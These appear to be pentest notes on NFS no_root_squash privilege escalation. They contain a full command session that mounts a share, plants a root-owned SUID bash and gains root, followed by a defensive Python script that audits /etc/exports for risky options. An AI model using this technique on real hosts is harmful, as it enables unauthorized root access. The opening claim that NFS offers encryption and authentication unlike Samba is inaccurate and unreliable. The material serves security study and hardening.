Network File System (NFS) is a file-system protocol that allows users to share directories and files over a network. It serves a similar purpose to the Samba protocol. However, unlike Samba, NFS provides an encryption mechanism and authentication. In addition, NFS server access is restricted to specified hostnames and IP addresses.
no_root_squash privesc
By default, an NFS server maps requests coming from the root user on a client to the non-privileged user nfsnobody; root's privileges are "squashed". With no_root_squash configured, requests are not squashed, meaning any client that mounts this directory can read, write and modify files within the directory as root on the host machine.
```
## Confirm that 'no_root_squash' is configured
[lowPrivUser@victimHost nfs]$ cat /etc/exports
/share/nfs *(rw,insecure,sync,no_subtree_check,no_root_squash)

## Low privileged account isn't able to read nfs directory
[lowPrivUser@victimHost share]$ ls -al
drwxr-xr-x   7 root    root     75 Jun 23 08:56 .
dr-xr-xr-x. 20 root    root    278 Aug 25  2022 ..
drwxr-x---   2 admUser admUser 189 Feb 19  2021 nfs

## Mount share from local attack machine
➜ /tmp mkdir pe
➜ /tmp mount -t nfs victimHost:/share/nfs /tmp/pe
➜ /tmp cd pe
➜ pe ls -al
total 5684
drwxr-x---  2 void void   189 Feb 19  2021 .
drwxrwxrwt 21 root root 69632 Jul  3 12:49 ..
-rw-r--r--  1 void void   823 Feb 19  2021 secret.conf

## Change privileges of mounted share so lowPrivUser can copy /bin/bash to share
➜ /tmp chmod 777 pe
[lowPrivUser@victimHost share]$ cd nfs
[lowPrivUser@victimHost nfs]$ cp /bin/bash .

## Change owner and set SUID bit on binary. Execute on victimHost to privesc
➜ pe chmod +s bash
➜ pe chown root:root bash
[lowPrivUser@victimHost nfs]$ ./bash -p
bash-4.4# id
uid=1651499380(lowPrivUser) gid=1102800513(domainusers) euid=0(root) egid=0(root) groups=0(root)

## Cleaning
➜ pe rm bash
➜ pe cd ..
➜ /tmp chmod 750 pe
💀 ➜ /tmp umount pe
```
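As an added example that is not part of the original notes, the following script audits the text of an `/etc/exports` file for the conditions that made the session above possible: `no_root_squash`, a wildcard client spec and the `insecure` option. The sample exports content is constructed; its first line mirrors the export seen above.

```python
# Added example: audit /etc/exports for risky NFS export options (defender-side check).
import re
from typing import Dict, List

# Matches "<path> <client>(<opts>) [<client>(<opts>) ...]" as written in /etc/exports
EXPORT_RE = re.compile(r"^(?P<path>\S+)\s+(?P<rest>.+)$")
CLIENT_RE = re.compile(r"(?P<client>[^\s(]+)(?:\((?P<opts>[^)]*)\))?")


def parse_exports(text: str) -> List[Dict]:
    """Return one record per (path, client) pair with its option list split out."""
    records = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        m = EXPORT_RE.match(line)
        if not m:
            continue
        for c in CLIENT_RE.finditer(m.group("rest")):
            opts = [o.strip() for o in (c.group("opts") or "").split(",") if o.strip()]
            records.append({"path": m.group("path"), "client": c.group("client"), "opts": opts})
    return records


def audit_exports(text: str) -> List[str]:
    """Return human-readable findings; an empty list means nothing risky was found."""
    findings = []
    for r in parse_exports(text):
        where = f"{r['path']} -> {r['client']}"
        if "no_root_squash" in r["opts"]:
            findings.append(f"{where}: no_root_squash maps client root to server root (use root_squash)")
        if r["client"] == "*" or r["client"].startswith("*."):
            findings.append(f"{where}: wildcard client, share is mountable from any host")
        if "insecure" in r["opts"]:
            findings.append(f"{where}: insecure accepts mounts from unprivileged source ports")
        if "rw" in r["opts"] and "no_root_squash" in r["opts"]:
            findings.append(f"{where}: rw with no_root_squash lets a client create root-owned SUID files")
    return findings


# Constructed sample: the first export matches the one from the session above.
SAMPLE_EXPORTS = """\
/share/nfs *(rw,insecure,sync,no_subtree_check,no_root_squash)
/srv/backup 10.0.0.0/24(ro,sync,root_squash)   # hardened export
"""

if __name__ == "__main__":
    for finding in audit_exports(SAMPLE_EXPORTS):
        print(finding)
```

Run it against a copy of the real file with `audit_exports(open("/etc/exports").read())`; any finding on a share that also holds files executed by server-side users deserves the `root_squash` fix first.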